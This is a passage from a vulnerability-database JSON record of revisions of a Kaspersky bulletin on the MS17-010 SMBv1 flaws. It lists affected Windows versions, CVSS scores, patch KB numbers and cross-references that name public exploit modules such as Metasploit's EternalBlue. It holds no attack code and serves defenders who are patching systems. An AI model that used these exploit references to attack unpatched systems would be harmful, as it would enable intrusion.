\n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) \n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>) \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>) \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>) \n\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)", "published": "2017-03-14T00:00:00", "modified": "2018-10-16T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-10-18T16:04:13", "history": [], "viewCount": 361, 
"enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2018-10-18T16:04:13", "differentElements": ["cvss", "cvss2", "cvss3", "description", "modified"], "edition": 4}, {"bulletin": {"id": "KLA10977", "hash": "8ec2e84df031d11bdd60a2f1874599ad", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple vulnerabilities in Microsoft Server Message Block (SMB) ", "description": "### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) 
\n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) \n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) \n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) \n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>)9.3Critical \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>)9.3Critical \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>)9.3Critical \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>)9.3Critical \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>)4.3Warning \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "published": "2017-03-14T00:00:00", "modified": 
"2020-11-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-12-03T07:12:31", "history": [], "viewCount": 518, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:42030"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27803", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", 
"THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2020-12-03T07:12:31", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2020-12-03T07:12:31", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2020-12-03T07:12:31", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "KLA10977", "hash": "7b443cff91f985d9a978bd8311ba61b88386c665678d1b5656fa06bb560f86bf", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple vulnerabilities in Microsoft Server Message Block (SMB) ", 
"description": "### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) \n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) \n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) \n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) 
\n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>)9.3Critical \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>)9.3Critical \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>)9.3Critical \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>)9.3Critical \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>)4.3Warning \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "published": "2017-03-14T00:00:00", "modified": "2020-11-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-12-03T07:12:31", "history": [], 
"viewCount": 515, "enchantments": {"dependencies": {"modified": "2020-12-03T07:12:31", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, 
{"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-12-03T07:12:31", "rev": 2, "value": 7.1, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2020-12-03T07:12:31", "differentElements": ["cvss2", "cvss3", "href", "modified", "references", "title"], "edition": 6}], "viewCount": 521, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": 
["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2018-16794"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-18T11:18:34", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-08-18T11:18:34", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.kaspersky.KasperskyBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.kaspersky.KasperskyBulletin"]}], "rapid7community": [{"published": "2017-05-24T23:14:26", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-05-25T17:57:11", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", 